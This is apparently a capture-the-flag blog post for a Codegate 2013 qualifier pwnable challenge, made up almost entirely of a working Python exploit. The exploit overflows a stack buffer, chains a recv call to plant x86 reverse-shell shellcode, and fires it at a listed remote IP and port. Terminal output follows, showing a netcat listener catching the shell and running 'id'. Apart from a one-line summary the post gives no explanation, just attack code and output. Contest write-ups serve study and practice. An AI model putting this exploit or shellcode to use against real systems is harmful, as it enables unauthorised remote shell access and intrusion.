Category : Pwnables
level2Summary : simple stack-based remote buffer overflow
Exploit
#!/usr/bin/python from socket import * from struct import pack p = lambda x : pack("<L", x) HOST = "localhost" HOST = "58.229.122.19" PORT = 7777 recv_plt = 0x08048780 freespace = 0x0804B0f0 pr = 0x08048983 fd = 4 shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # reverse connection with /bin/sh payload = "" payload += "a"*0xef payload += p(recv_plt) payload += p(pr) payload += p(fd) payload += p(freespace) payload += p(len(shellcode)) payload += p(0) s = socket() s.connect((HOST, PORT)) s.recv(1024) s.send("write "+payload) s.recv(1024) s.send(shellcode) s.close() |
root@ubuntu:~/vuln/200# ./exploit.py ---------------------------------------------------------------- root@ubuntu:~/vuln/200# nc -lv 31337 Connection from 58.229.122.19 port 31337 [tcp/*] accepted id uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013) |
'CTF > 2013' 카테고리의 다른 글
| Plaid CTF 2013 - pork (Exploit only) (0) | 2013.04.22 |
|---|---|
| Codegate 2013 Qual - Vulnerab 500 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual - Vulnerab 400 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual - Vulnerab 300 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual Pwnable Chal Exploits (0) | 2013.04.17 |